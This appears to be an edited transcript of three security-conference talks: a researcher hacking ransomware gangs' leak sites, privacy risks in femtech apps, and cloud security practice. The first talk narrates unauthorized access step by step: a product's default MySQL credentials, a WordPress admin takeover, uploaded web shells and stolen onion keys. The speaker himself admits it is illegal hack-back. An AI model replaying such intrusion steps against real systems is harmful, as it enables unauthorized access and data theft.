>> No — and that's behind Tor. They're highly sophisticated. So, do we all know what this is? Nice. So, I did what every hacker does: I wore a black hoodie, and I went and ran WPScan. 42 vulnerabilities identified — they had a really outdated install — but unfortunately I'm not that skillful, so I wasn't able to exploit any of those vulnerabilities. I could only find that PHP error reporting was on, that it was a Windows machine (because who uses Linux nowadays?), and that they were on VertrigoServ hosting. I also had file listing, and phpMyAdmin was there. Then I did what every super-hacker would do and googled "VertrigoServ default MySQL password": the MySQL default user is root and the password is "vertrigo", plus SQL blah blah blah. I tried it, and I failed. But then — as I already told you, I have two sons. One son is a musical prodigy of some kind; the other one is weird like me, so he likes going around reading my tabs, because, like all of us, I have a hundred open tabs. And at some point he says: who the [ __ ] names his product "Vertrigo" and not "Vertigo"? I'm like, what the [ __ ] are you talking about? It's not Vertigo, it's — so, I should have copy-pasted and not typed it. The password was "vertrigo", and so, yep, I was the admin. I'm the admin in WordPress — and by admin in WordPress I mean I just reset the password and got in. Then I uploaded a shell. So I had their IP address, and I had all their data, because who am I? The administrator. As you can see, they're not English speakers; they're Russian. And their biggest crime — can anyone guess what their biggest crime is?
>> Dude, you're making half a billion in three years. Pay a [ __ ] developer, for [ __ ] sake. So, what did I do? Database export, username extraction, remote command execution on the server, got hold of their onion secret keys — so they have to change their onion address if they don't want me monitoring their [ __ ] — and lots of logs to analyze, a couple hundred gigabytes.
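One detail worth unpacking: why leaked onion secret keys force a gang to move. A v3 onion address is derived deterministically from the service's ed25519 public key (per Tor's rend-spec-v3), so whoever holds the matching secret key can simply *be* that hidden service. A sketch of the derivation, using a dummy all-zero key rather than any real one:

```python
import base64
import hashlib

# Derive a v3 .onion address from an ed25519 public key, per Tor's
# rend-spec-v3:
#   checksum = SHA3-256(".onion checksum" || pubkey || version)[:2]
#   address  = base32(pubkey || checksum || version) + ".onion"
def onion_v3_address(pubkey: bytes) -> str:
    assert len(pubkey) == 32  # ed25519 public keys are 32 bytes
    version = b"\x03"
    checksum = hashlib.sha3_256(b".onion checksum" + pubkey + version).digest()[:2]
    return base64.b32encode(pubkey + checksum + version).decode().lower() + ".onion"

# Dummy key just to show the shape; a real service's address comes from
# the hs_ed25519 key material sitting next to the leaked secret key.
print(onion_v3_address(bytes(32)))
```

Since the address is a pure function of the key, a stolen secret key can't be rotated away quietly: the gang has to generate a new keypair, which means a new address, which means telling all their "customers" they moved.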
That was Black Hat 2024. Afterwards, they changed the IP address — but they did not change the login. Again: same thing. Then they changed everything, but forgot to remove my web shell. So they changed everything again — but I also had another web shell. And then, back in this March — because a lot of people said "oh, you didn't prove you had access, you're just saying [ __ ]" — I did it live at BSides Prague, in my talk: someone hacked ransomware gang Everest's leak site. So if you remember the "XOXO from Prague" — that was me hacking Everest live from BSides Prague, because I'm bored and a bad person. Dark Angels emerged in May 2022. High-profile targets; Babuk-based, Linux/ESXi-focused; received the record $75 million ransom. I really love that guy Rakesh Krishnan — he always finds [ __ ] that I can look at. He found the actual IP address; it's still live, if you want to take a bite. App secret, MySQL password, etc., etc.; .env file exposure; internal URLs exposed; some error logs exposed. I found some messages, but it wasn't really fruitful. That was fast — I could have done some more, but yeah. And we're getting to the end of the talk, and we're also getting into things that are really interesting and really don't have a correct answer. I don't like correct things,
black and white, gray and [ __ ] So, do any of you see the issues we have with that research? Nope? No one?
>> It's [ __ ] illegal, mate.
>> So — like, it's the definition of hacking back. And I'm really lucky to live in a country that is not actively pursuing hacking back; in order to prosecute me, the person who was hacked usually needs to sue me. But if I were doing this here — which I never would — I would end up in jail. So it's one of those strange situations where you are not exactly bad, but you are doing bad things. So, as the closing keynote of this conference is going to say: we need to not be criminals. We need to save our kids from becoming me. Conclusion. At BSides London 2022, I went after spyware. At DEF CON 31, I went after stealers and botnets. And in this talk, I went after ransomware. That's four out of the five horsemen from VX-Underground. I want to say that I beat all of them, but I did not. I can say that I looked all five horsemen in the eyes and never looked back. So I think I won — but even if I didn't win, I didn't lose, at least. That's a win in my
book. Thank you, guys. And we do have some time for questions.
>> Yeah, any questions? Happy to take them — I'll run around.
>> Thank you very much for the presentation; there were some great insights there. Why do you think these so-called sophisticated attackers make these websites that are really easy to hack, and just never improve?
>> Because they don't really care. For the C2s, they really think they're online only for the attack window — that's half a day to a day, so you have to be extra quick. And for the WordPress sites, I think they don't really understand what the [ __ ] they're doing. They care about getting the easy money in, and nothing else.
>> Thank you.
>> Thank you. Anyone else? Oh, the lady here.
>> Hi. Absolutely loved your talk. I wanted to ask what you think of the cartelization of ransomware groups — like the Crimson Collective and the Scattered Lapsus$ Hunters groups coming together to infiltrate targets together.
>> I can answer it in a single word: it's capitalism. Again — I also love capitalism, I'm just saying. But it's one of those things: they will unionize, they will become one, so that they can maximize profits by minimizing their costs. So again, capitalism.
So they will try to ease their way into anything. Okay. Anyone else? Guys, folks, thank you again.
All right, thank you so much — great presentation. A couple of practical things. We have an early coffee break, so coffee will be served in the back. If you want to sit down, you can go down to the restaurant. Also, outside is a huge photo booth. I know it says €5, but it's free, so use it. Oh yeah — throughout, you'll see QR codes asking for feedback. Please leave it. We have two types. There's speaker feedback, per track, so you can leave your feedback for all the individual speakers; we'll relay that feedback so they know how to improve — or to say "malakas" a few more times. It's my best Greek word. There's also feedback for us, the organization — that's overall. So if you have anything we could improve, or you just want to tell us you love it, please do so. Thank you.
You can just keep it, I guess. >> Are we ready to go?
>> All right, welcome back, everybody. Please grab a seat if you want to sit here for the talk. Our next speaker is Arohi — I'm hopefully pronouncing that somewhat correctly. She's a security engineer at SQR, and she will be talking about femtech and the technical and ethical implications around this kind of technology. So please give a very warm welcome to our next speaker.
>> Hello everyone, welcome to my talk. I'm presenting on "Beyond the Pink: Data Risks in Femtech You Can't Ignore." I'm Arohi, I work for SQR as a security engineer, and this is my passion project. It started with a simple everyday event: I was looking for a period tracker for myself, which counts as a femtech app. As I was searching, I have a habit of looking at the privacy policies and data practices of apps before I give my data to them — and the deeper I looked, the more concerning and stranger the policies got. That's how I got into a rabbit hole of really weird data collection practices, and that's why I'm here to share my insights with you. Hope you enjoy it. So let's start with: what is femtech? Femtech, or female technology, is a term used to describe software and services that use technology tailored towards women's health and wellness. These are fertility trackers, period trackers, pregnancy and nursing care, women's sexual health and wellness — applications like Flo, Clue, Maya; you must have heard these names, they're really big names right now. And femtech is not limited to mobile apps; it also includes wearables, diagnostics, and telehealth services. But today we will focus mostly on the
mobile apps. So, femtech in Europe is a big thing now. Europe makes up 28% of the global femtech market, with more than 540 active companies in 23 out of 44 countries, and by 2032 the European femtech sector is expected to grow beyond $35 billion. Isn't that insane? And still we're at a stage of infancy with femtech, because it's a highly underfunded and under-researched field. Even if it's growing in terms of money, we still lack a lot of data collection and regulation around it. And I guess this gap is not something to be bothered by — it's a good opportunity to create more transparent and evidence-based femtech in the coming years. Femtech apps have been around for a long time now, since the early 2000s, but they got traction after the Flo app's controversy around data privacy — sharing users' data with third parties — in 2021. And it's continuing: it happened again this year, twice now. I can't really go into the political nuance, but it's high time we looked into it. These apps are incredibly popular: they have tens of millions of users per month and hundreds of millions of downloads worldwide. But why? Why do we seek femtech apps? To understand our bodies better; to manage fertility; to achieve or avoid pregnancy; for emotional validation and community. A lot of these apps have a
community feature, so you can go in and ask your queries. They do say, with a disclaimer written above, "don't put personal data here" — but there's a lack of digital literacy around the world, so we do put our personal data there as well. We also use them for convenience, because it's not always easy to manually track your period, and to feel empowered and informed. And I relate to all of this: when I was young, I was taught to manually track my cycle on a calendar in our kitchen. But now, with all the femtech apps, we have so many more insights, so many more data points to look at.
But the thing is, femtech apps also come with a lot of empowerment wrapped around them. You might recognize some of these — slogans that very famous femtech apps use. "Your health, simplified with us." "The birth control app your friends won't stop talking about." My favorite: "all-natural birth control, powered by your body's signals." Does that sound empowering to you? Does it? Well, it's not just the slogans: empowerment comes wrapped in aesthetics as well, aesthetics they deliberately use — and once you spot this aesthetic, I'm sure you won't unsee it. Bear with me. Can you see all these apps? These are the most famous ones: if you go to the Google Play Store or the Apple App Store and just type "femtech" or "period tracker", these are the ones at the top of your list. Can you sense a theme? Is it all too pink? I find it quite stereotypical — but that's my opinion, and you can have your own; some people like pink, and that's cool. But this is the aesthetic they use: all of these apps are pink, and the second most used color is purple. I get that it's a marketing gimmick — pink is read as a feminine color, used for visibility and inclusivity. But these apps were traditionally made to empower women. Don't you think that, with this
pink branding and these empowerment slogans, they're actually driving us away from empowerment — the very thing they were made for?
So what is beyond the pink? Have you heard about the pink tax? The pink tax is usually associated with everyday products — razors, deodorants, shampoos, lotions — that women pay much more for because they're pink. It's not usually associated with femtech, but with AI-powered insights and premium versions of these apps, I think the pink tax has found its way into femtech as well. And it's not just money: we also pay in terms of privacy and data exploitation. Isn't that a pink tax as well? Behind the friendly colors and empowerment slogans lies a complex ecosystem of data, algorithms, and sometimes invisible risks. Let's get into some technicalities.
These are some of the data collection practices femtech apps currently use. Whenever you download any kind of app, it takes your device data — which I'm fine with. It takes behavioral metadata — again, general data; all apps do that. All right, good. But then, with femtech, they ask you to log into the app: there goes your name, email, contact information. Most of the apps now have premium features, so there goes your payment information as well. A lot of them collect location data for some reason, which I find a bit unnecessary, but they do. All of this is personally identifiable information, or PII. What goes unnoticed with femtech is that beyond this information, there's far more personal and intimate information these apps are collecting. There goes our menstrual cycle data: period dates, irregularities, flow intensity, ovulation test results, pregnancy tracking, conception date, due date, menopause symptoms, birth control. Then we have sexual health data — femtech apps not only take your data, but indirectly they're taking the data of your sexual partner as well. Then mental health and emotional well-being: they have really good mood-logging features, which are insightful. But all of this information, when combined, creates a digital profile — and even if it's not all coming from one app, when information about you also comes from other third parties, it adds up to a whole profile of a person. Then there's lifestyle data: these apps have features for water intake — a good example of how niche we're going — sleep patterns, breastfeeding and lactation data, medical history and doctor visits. This is what I find really concerning: you can log your doctor visits, and some of the apps also take what medication you're on, or what kind of treatment you're going through, so you can log your diagnosis as well. It comes with a disclaimer — when they provide AI-powered health insights, they say you should not trust these and should seek help from a medical practitioner — but it's written so small that you hardly see it, or if it's a popup, we don't take the five seconds to read it; we just close it because it's irritating. Let me give you an example of why this is so crucial. Imagine a woman logging her breastfeeding data into an app that is also collecting her location data along with it — and somehow this data is leaked, or sold, or ends up in the hands of data brokers. They have a full profile of her, and of her child. They know where she is, with her child, alone, at her most vulnerable. That is not just a digital risk anymore; it has escalated to a physical safety risk
— which invites us to look at the privacy policies of these apps. Do we actually read privacy policies? Nobody does, right? They're long, complex, full of jargon — and they put the accept button in bold pink, or blue, or whatever color you like. And there's hardly an option to reject, because if you reject, you might not be able to use the app. But if you take some time and read them, you might find some concerning patterns. In 2022, Mozilla did a study on these femtech apps and their privacy policies, and rated them on a scale of creepiness, from most creepy to least creepy. And kid you not, the
most famous apps right now are the creepiest. And I thought: well, that was 2022, it's fine — so I did a review myself after three years. It might be better. But no, it was not any better. This is what I found. There's ambiguity in language: they use terms like "we may share your data with trusted partners" or "your data is used to improve our services." It sounds harmless, but it's vague. Who are these trusted partners? What data is used to improve which services? We don't know. I read one of these privacy policies and it said, "we do not sell your data" — and just three lines below, it said, "we use your data for marketing and research purposes." Doesn't that mean it's still being monetized somehow? Then there are difficult opt-out options. Of course, because of GDPR and everything, these apps need to provide user-controlled deletion — but if you go into any of these apps, it's so difficult to find where to opt out of any kind of tracking, or to delete your data. This is one thing an app should make easy, isn't it? We don't read the whole privacy policy anyway; at least let us find the settings clearly, I would say. Then there's third-party involvement, of course. A lot of these apps let you sync with your partner's device, and with wearables as well, like Fitbit, and they also have integrations with other apps, like your built-in mobile apps. With all of that said, it feels really nice that you can integrate — everyone can have visibility, and everything. But if you read the privacy policies, there's so much lack of responsibility. The femtech app might say: you're free to integrate your data, but we take no responsibility for data that goes outside our app. And if you read the privacy policy for any wearable, they say: we get our data from third parties, and we're not responsible for how they track it or how we get it. Then who do we complain to? In terms of regulation, the EU is still good, but we don't have one single regulatory body for femtech. Right now we have three that align somewhat with femtech. There's the MDR — the Medical Devices Regulation — which determines when a femtech app counts as a medical device, and then it must meet all the safety regulations and testing standards. Then there's the Digital Services Act, which is more reactive than proactive — by which I mean that if you complain
only then do they act on it; otherwise it's just guidelines. It addresses platform transparency, targeted advertising and accountability — this is more about influencers and how you market the app. And of course there's GDPR, which governs how sensitive health data is processed, stored and shared. We have upcoming EU regulations — the EHDS and the Digital Fairness Act — which I think we should keep an eye on. But I still think that, because regulation is so fragmented, and given how much the femtech industry is growing, we need a dedicated regulation, or at least we need the MDR to act on it. So let's talk a bit more about the MDR. Medical device regulation only applies when a company labels itself as a medical device. Most of these apps label themselves as "wellness" or "health and fitness", and that's how they bypass the MDR. The MDR does state that if your device or app is used to diagnose or to predict things related to reproduction or fertility, it should be classed as a medical device — but in practice it is not, and that's a big gap. That's how they bypass all the safety testing and oversight. What do you think a privacy-first future would look like for femtech? Have you heard about data anonymization? I bet everyone has. So that's
that's just the basic thing you need to do according to GDPR and everything. But again research has shown us over and again that uh we can still get back to the original data even if we anonymize data now and none of the fem apps have gone beyond data anonymization really. So there's another thing called differential privacy which means that you can add noise uh to your data. That's how um you kind of anonymize it and it's an advanced technique for data anonymization I would say. So you cannot trace back to your data. So it's time that we use better functionality or better majors in these terms. I guess a lot of these apps use of course I guess
cloud backups uh because it's easy but uh then again it with cloud storage it anyways comes with a lot of its own vulnerabilities but then uh there's Apple's health app that does ondevice data processing and that also asks the users if they want to back their data up or not which is a fair deal I think Why why would I want somebody to take a look at my data um just so easily just because I back it up myself? But if I know that I don't want to back this data up, then it that feels empowering to me. That feels that I am in control. So yeah. Um but there's again it's just the Apple Health app doing the ondevice
processing and no default backups. It's not a norm yet. User control deletion as I said earlier those settings are really deep into the app and really difficult to find and again what's the guarantee that it is the data is collected wisely and what's the guarantee that if even if I uh you know delete my data from the app it's actually being deleted. you know when the 2021 flow app controversy happened um a lot of women um deleted the app completely but that does not mean right that the data is being deleted it's just the app but again there's so much lack of digital literacy around that we think if I don't use the app anymore I'm safe
then encrypted data syncs this is really something that I was shocked to know. Um so as I said that these apps have um the functionality to sync with your partners' app or variables. So a lot of these apps if you read the policies or their data collection practices they explicitly mention that there's no encryption in between and it is crazy. We have gone so much advanced with other security measures and everything right now and how how are we not encrypted yet?
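The differential-privacy idea she mentions, adding calibrated noise so that individual records can't be traced back, can be sketched in a few lines. This is a toy illustration only: the Laplace mechanism over made-up cycle lengths, with invented bounds and epsilon; it is not what any femtech app actually ships.

```python
import random

def laplace_noise(scale: float) -> float:
    # The difference of two exponential draws is Laplace(0, scale).
    return random.expovariate(1.0 / scale) - random.expovariate(1.0 / scale)

def dp_average(values, epsilon=1.0, lo=20.0, hi=40.0):
    # Differentially private mean of bounded values (e.g. cycle lengths
    # clamped to [20, 40] days). Changing one record shifts the sum by at
    # most (hi - lo), so that is the sensitivity we calibrate noise to.
    clamped = [min(max(v, lo), hi) for v in values]
    noisy_sum = sum(clamped) + laplace_noise((hi - lo) / epsilon)
    return noisy_sum / len(values)

cycles = [28, 30, 27, 31, 29, 26, 33, 28]  # invented sample data
print(round(dp_average(cycles, epsilon=1.0), 1))  # noisy estimate of the true mean (29.0)
```

The point of the sketch: the aggregate stays useful while any single user's entry is hidden in the noise, which is exactly the "you cannot trace back to your data" property described above.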
When we talk about data breaches, we usually talk about monetary or reputational losses. But with femtech collecting so much intimate information, I think we need more of a sociological approach, and I'll tell you in a bit why. If we look at it as a threat model, the assets would be personal and intimate health data, behavioral metadata, user identities, shared privacy, and user-generated content. Then there are threat actors, and they are not just developers and advertisers: there are employers, governments and abusive partners as well. Just as an example: if an employee's data is breached from her femtech app, firstly it might lead to a lot of stigmatization. But if everyone in the company knows, and suddenly her manager passes her over for a promotion because they know she's trying to conceive, isn't that workplace discrimination? Isn't that crazy? It's an extreme example, I get it, but it could still happen. That's why I say employers, governments, abusive partners, communities, stalkers and cybercriminals are all threat actors. In a lot of societies and countries right now, menstruation is a taboo topic and not many people talk about it openly. In such a place, if somebody is using a femtech app and someone finds out that they are trying to conceive, or that they have a missed period, it can cause a lot of social backlash. Also in terms of government and prosecution: in countries with really stringent abortion laws this could go haywire, because even a missed period, or even a gap in your logging, can be used as app data to prosecute someone.

Then the attack vectors: dark patterns, SDKs, GPS (a really big one; I still don't get why we need location data for this), APIs, coercion and surveillance, inferred disclosures, and legal loopholes. One thing to mention about the health insights these apps provide: we don't really have cohesive EU data for femtech; it's a limited amount of data, mostly from the US, because it all started in the US. We would need a more location-aware, comprehensive database to give health advice, but instead all of these apps assume a lot about your gender and emotions, and that's how the health advice is generated. That's what I mean by inferred disclosures: they just conclude from generic assumptions.

There are critical gaps, as we spoke about: weak and manipulative consent mechanisms, lack of data minimization, and absence of collective privacy safeguards. By collective privacy I mean not just the logged-in user's privacy, but also the privacy of their child or their partner, because we are indirectly giving away all that data as well. Then algorithmic bias and lack of transparency. Psychological harms are something we always miss: over-reliance on flawed AI, for instance. They do say these are health insights, not health advice, but in an emergency we take them as advice. There have been a lot of comments and social media posts saying "the app is so good that it told me about my health condition before my doctor did", which is just crazy. Then false reassurance, health anxiety and obsessive tracking. It can be obsessive because it's similar to scrolling Instagram Reels: it's addictive to track, because the app gives you health insights every now and then and pops up notifications like "you must be cranky today because you might be ovulating", which is really annoying at times. I wasn't cranky today, but now that I saw the notification, I am. There is also a lot of shame and stigma around this: if any of this data leaks, it could lead to a lot of stigma for women and their families.

Overall, this is creating a loss of trust in digital care. These apps were made to empower women, and I don't think they're doing that anymore. This has been going on for a long time, with a lot of news coming out about sensitive data and really concerning data practices, and that's leading to a loss of trust, which is the last thing we want, isn't it? I think real empowerment in femtech requires re-centering privacy, autonomy and ethical accountability, while transforming invisible harms into visible change. Our data belongs to us: not to governments, not to advertisers, nobody but us. So I just want to urge everyone to be aware, ask questions, and take control of your data. Thank you.
Do we have time for questions? >> We have about two minutes for questions. So, does anybody have a question?
>> Hello. Thank you for the great talk. I think it's a very important topic and issue, and I'm just curious whether you can think of, or know of, any digital alternatives we can use. We can of course use normal calendars, but what about the digital world?
>> There are a few options that are pretty fine, like Apple's Health app, or an app called Yuki that does on-device processing, so it's almost offline. For myself, I have written Python code that I use to track my cycle. A lot of these apps now also have anonymous modes, which I'm not very sure about; the thing is, they don't have the same functionality as the full app, but it's still better to be anonymous somehow, I guess. The best way, though, is if you can write the code yourself.
>> All right, one more question maybe. Okay.
>> Thank you for the talk, it was actually really insightful. You spoke about regions globally where some of this is taboo to talk about. Have you noted in your research any apps or companies that have adapted their policies to be more evasive for regions where it is considered taboo?
>> I did look at that, and no, none of the apps have actually taken a sociological approach. It's very generic and mostly targeted towards the US and Europe; it hardly takes into consideration regions, like some regions in India or Africa, where it's really critical to even speak about these things. There's absolutely no consideration. The thing is, there's a lot of lack of awareness around it. Even in my own circle: if I talk to my friends, or to the older people in my family, they don't even know these apps exist. And when it comes to the younger generation, even if they do know about these apps, there's no consideration of how much data we should give them. With social media it just becomes a bubble, isn't it, the word just spreads out. And this has happened in some countries with really stringent abortion laws: this kind of data has been used for prosecution and it has gone really, really wrong.
>> Okay, we're out of time. Thank you very much for the talk.
>> Thank you.
All right, welcome back everybody. Our next speaker is Risa Bar. She does cloud and AI infrastructure at Microsoft, and she'll be talking about building secure foundations and gaining some resilience in the cloud, which I think is a rather important topic, because that's where all my data is.
>> I'm not sure if... yeah, now my mic is on as well. First of all, I really want to thank BSides for inviting me onto this stage. You did an amazing job organizing this event and I'm very happy to be part of it. Today we'll talk about cloud security anno 2025, and I'm going to talk about some things where you'll feel like: of course, this is simple, this is easy. Well, then maybe help the companies in the Netherlands to actually implement them. I work for Microsoft as a cloud, AI infrastructure and security solution engineer; I talk to all of the big organizations in the Netherlands and I help them adopt the cloud in a secure and safe way. A lot of the things I talk about today, they really struggle with. So if you look at my talk and think, "Yeah, but this is easy, this is a no-brainer, you should just do it", well, please come talk to my customers and help them implement these things in a secure way.

I'm a security enthusiast; I've been working in the cybersecurity field for almost 15 years now, and I really enjoy it, especially because you have to learn new stuff on a daily basis, otherwise you're out of the game. I'll first talk about today's security challenges, then about how you can secure the use of SaaS applications, and then about what you can do to make sure that your IaaS and PaaS applications are secure as well. I'll close off with some key takeaways, and if you have questions, feel free to ask them at the end; there's also lunch served after my talk, so we can continue the conversation over lunch.

When I started my IT journey 15 years ago, everything at the company I worked for was still on-prem, and then some Microsoft people came over and said: come to the cloud, come to the cloud, because it's super secure. At that time that really was the feeling: if we go to the cloud, maybe our IT systems will be more secure, because on-premise we had to secure the network ourselves, we had to secure identity, there was a lot to do; in the cloud, big companies like Amazon, Google and Microsoft would take care of those things.

But look at it nowadays. Of course I used Copilot a lot to generate some of these slides, but I also asked it for examples of cloud-security-related incidents from the last year, and the list was super long. I just pasted some of the names here on the slide; I think it was yesterday that Cloudflare had an incident, and Microsoft also had incidents in the last few months. So you see cloud security incidents happening on, I think, a daily basis, also with the very big names. Cloud security is not that easy.

So what are the biggest security challenges with the cloud nowadays? From all of those logos you saw, most incidents were caused by misconfigurations and human error. People make mistakes. With CrowdStrike, for instance, somebody really did their best to deploy something fast, but made a mistake, a lot of computers became inaccessible, and people couldn't take their planes, because KLM was a big user of CrowdStrike. It's human error. The other thing: there are a lot of known, unpatched vulnerabilities in the cloud. If I go to my customers and we look at some dashboards, it's amazing how many vulnerabilities are out there; sometimes they don't even know what to patch anymore, because there are so many. And with a lot of these vulnerabilities, yeah, it's also not that bad: if you have a server with a vulnerability that is not directly internet-facing, then maybe it isn't a problem yet, and they feel like, I don't have to fix it.
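The patching dilemma described here, too many findings and no sense of which ones matter, is often handled with a crude risk ranking. Below is a sketch with invented field names and weights, not any vendor's actual scoring model:

```python
from dataclasses import dataclass

@dataclass
class Finding:
    host: str
    cvss: float            # base severity score, 0-10
    internet_facing: bool  # directly reachable from outside?
    exploit_known: bool    # public exploit code available?

def priority(f: Finding) -> float:
    # Toy heuristic: exposure and exploitability outrank raw severity,
    # which matches the speaker's point that a non-internet-facing
    # vulnerability may not be a problem yet.
    score = f.cvss
    if f.internet_facing:
        score *= 2
    if f.exploit_known:
        score += 5
    return score

findings = [
    Finding("db-01", 9.8, internet_facing=False, exploit_known=False),
    Finding("web-01", 7.5, internet_facing=True, exploit_known=True),
    Finding("build-02", 5.0, internet_facing=False, exploit_known=False),
]

for f in sorted(findings, key=priority, reverse=True):
    print(f"{priority(f):5.1f}  {f.host}")
```

Note how the internet-facing web server with a known exploit jumps above the higher-CVSS but internal database host: that is the whole argument for exposure-based triage instead of patching by severity alone.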
The other thing behind a lot of these logos is identity and access management issues. Multi-factor authentication is a technology that has existed for a long time, but not everybody uses it correctly, or they have MFA solutions that can still be intercepted. Another issue that a lot of enterprise companies face is the use of shadow IT and shadow cloud solutions: it's super easy to Google something, find a nice application and start using it, but what if you also put enterprise data in there? And as the speaker on the main track said earlier about ransomware: these ransomware groups have also discovered that there's now a lot of interesting data in the cloud, so they attack the cloud more and more frequently. The other issue is compliance. Just because you can use something doesn't mean you are allowed to. Especially in Europe, where we have complicated laws across different countries, you really have to think about what you are allowed to use. I work, for instance, with a lot of large banks that also operate in Germany, and some of the controls they apply in the Netherlands they are not allowed to put in the cloud in Germany. You have to think about these things up front, and it's complicated. Then there are insider risks, which also grow in the cloud; insecure APIs, because so many cloud components communicate with each other; supply chain risks, because you use so many different technologies, and if something breaks there, it can have big consequences for others; and last but not least, the rise of AI also powers the rise of AI-powered attacks, which is becoming a problem for the cloud too.

So if I look at this list and look back at the time when I was still working on-premise, I wonder: am I really more secure? There is a lot to think about to make the cloud secure. So who should actually fix this? And maybe, to take one step back: is this problem getting smaller? No, it's only getting bigger. A lot of companies have now started to adopt generative AI, and they also use generative AI to produce new applications, so the speed at which new applications pop up in the cloud is growing too. And you see it in the numbers: the rise in cloud security attacks is crazy; it grows year over year. One of the issues is also that you have a lot of different security vendors that each focus on specific elements, and at the end you have to tie everything together again, because attackers nowadays are really smart: they know that you have different tools and that we still work in silos.

So let's go back to the responsibility model. Is there anybody in the room who hasn't seen this before? A few people, I see. Basically, the shared responsibility matrix says who is responsible for which elements of your cloud applications. When you were still on-premise, you were responsible for the physical layer, the application layer and the usage layer. If you go all the way up to software as a service, most of the layers are taken care of by the cloud provider, but not everything. A customer is always still responsible for the usage layer: for the data that's in there, for making sure the right accounts are in there, and for making sure the controls and configuration in the application are set up correctly. In the middle you have platform as a service and infrastructure as a service. With infrastructure as a service, companies like Microsoft take responsibility for the physical aspects and the rest you have to do yourself; with platform as a service it's really a mixture, where customers do some things themselves and Microsoft, Amazon or Google take care of the rest. But a lot of people forget this. They think: I do something in the cloud, so Microsoft handles it. They say, "Yeah, but I bought a PaaS service from you, so it's secure, right?" And I say: no, it can be secure, but you still have to set it up correctly so that hackers cannot come in.

So let's go one step deeper: how do you secure the use of SaaS applications? The first thing is that, as a company, you really need to understand which SaaS applications your users are using. And with the rise of generative AI, you have to think about these things fast, because users really want to adopt new technology. When I was a security officer back in the day... this picture shows how much time it takes before 100 million users on the planet adopt a certain technology. For smartphones, it took 16 or 17 years before 100 million users started using mobile phones. So at that company back then, we took almost a year to select all of the security controls to allow smartphones in the company. If you look at ChatGPT, it took two months before 100 million users adopted that technology. So as an enterprise company, you don't have a whole year to decide whether to allow something; you have to act fast. You really have to decide: do I want this application to be used by my users, yes or no? There are a lot of tools out there, from Microsoft but also from many other vendors, that can help you assess what your users are using; then you can put governance controls on it: do you block it, do you allow it, or do you allow it with certain controls?

With this, it is critical to really focus on the data. What is the data that you want to protect? To answer that, you first need to know what data your company is using and which data is critical for you, and then you put controls on it like information protection, encryption and data loss prevention policies. And don't forget that you also need to govern your data: if data is not needed anymore, maybe throw it away. Sometimes you have to keep data for regulatory reasons, but you really need to think about these things, because that data can also end up in SaaS applications. And with software as a service you also shouldn't forget that your SaaS applications might be communicating with each other. During the keynote from
Ro, he also talked about the rise of agentic AI, agents doing a booking for you, for instance. Well, your agents might also be talking to other agents, and you need to think about that too; there are a lot of ways in which you can control it. So that, at a very high level, is what you can do to secure your SaaS applications.

But what about your PaaS and IaaS applications, the things you put in your Amazon, Google or Microsoft cloud? The biggest challenge here, and I talk to a lot of these companies, is really the silos in the company. I ask the security people: who's responsible for cloud security? And they say: well, that's the cloud platform team. Then I ask the cloud platform team: who's responsible for security? Well, the developers have their own subscriptions, so they are responsible for it. Then I ask the developers: are you taking care of security? And they say: if they want us to implement security controls, the security people should tell us. And in the end I'm like: okay, so nobody is taking care of security. Let's take a look at your cloud estate. And then we actually see that a lot of things are wrong, and I'm just so happy for these companies that they haven't been hacked yet. Or maybe the hackers are super smart, because they know they have access to a lot of data and they just won't tell anybody about it yet.

One way to overcome these silos is to really collaborate and work on the idea of a secure landing zone. Does anybody know about secure landing zones already? I see some hands; not everybody. A secure landing zone is just like an airport: you have a watchtower, you have the airport itself, and some things, the luggage carriers and so on, are arranged centrally for everybody, while the pilot still has some room to do his own thing, as long as he lands on a designated landing platform. You can do the same in the cloud. When you create landing zones, you think carefully about what you arrange at the platform level and what you arrange at the application layer. When you design these secure landing zones, there are a lot of different topics to cover, and these topics hold for Microsoft but also for the other big cloud vendors out there. From a security aspect, it is really important to think about identity and access management, how you will do your networking, and how you will set up your security. What you end up with is something like this, which looks a bit complicated, but what it shows is that certain aspects are already arranged by the platform, related to your security, your identity, and so on, and within that, application teams get specific zones where they can deploy their
applications, but the boundaries are already controlled by the platform itself, in collaboration between the security team, the cloud platform team and the DevOps teams. If you zoom into one of these applications, the application itself still has a lot of controls of its own, but other elements, like identity and access management and policy enforcement, are done through the central platform. In the platform you can say, for instance: I will never allow a storage account to be publicly accessible from the internet. These are the controls you can set at the platform level, and no application can overrule them without getting an exception first. This is what lets you say: these are the boundaries, this is your safe landing zone, and within it you can continue.

But that application still needs to get to the cloud, and that's where your secure code-to-cloud principles come in. The first step is that while a developer is coding, he or she is continuously alerted: there are vulnerabilities in your code and you should fix them, because you don't want to start with applications that have known vulnerabilities before they are even deployed to the cloud. Once the application is done, you also need to control your pipelines. Pipelines are the way you deploy applications to your cloud platform, and you need the right controls in place: who can make changes to your codebase, who can deploy things to your cloud, because you don't want just anything deployed to your cloud environment.

And once everything is in the cloud, you also need runtime protection. I sometimes say this is like a diaper for your cloud, because you just know that things will happen, right? I have a four-year-old, so I know: although he can do things by himself, he still needs this. And it's what you really need in the cloud, because new vulnerabilities are exposed daily and people make misconfigurations. There are a lot of different flavors of runtime protection, things that defend your servers, your APIs, your containers, your secrets, and so on, and you need all of them to make sure that if something happens to your cloud environment, you have a layer of
protection before things really go wrong. And of course, you also need security monitoring in the cloud that collects all of this information, from all of your runtime protection tools, your identity and access management systems, and the status of everything else, so that you can monitor it in a SIEM, sent to Splunk or whatever, because you really need to see everything that's happening in the cloud.

What I see happening now as a new trend, which I think is really good, is that we are moving to a shift-left approach: instead of focusing on everything that can go wrong after the fact, we take one step earlier and do continuous threat and exposure management. The picture here is just an example of how Microsoft implemented it, but the idea is that instead of looking at all of the different cloud vulnerabilities in isolation, you tie everything together: you also look at what your users are doing, what's happening in your mail, what's happening in your cloud, and what you get is an attack path showing how an attacker could potentially breach, for instance, your storage account. In most cloud environments, the list of vulnerabilities is so long that nobody feels like fixing it anymore. But if you can see the attack path an attacker could take to get access to certain elements, then you know exactly which threats to focus on. You get things like choke points: you know, okay, if I fix these servers, if I fix this identity, then I become more secure. You can focus on the actual risks instead of just focusing on compliance, on patching because you need to patch. Of course you need to patch, but with this you get insight into what an attacker could do, and you fix it before an attacker actually does it. And you need that diaper, so to speak.

Just an example: you get an attack path where some servers are exposed to the internet with vulnerabilities on them; on one of those servers there is an identity that can log into a different VM; on that VM there's a secret stored that gives access to a storage account; and because you put everything into the system, you also know that there's personally identifiable information in there. And because you know this attack path exists, you also know exactly what you need to do to fix it.
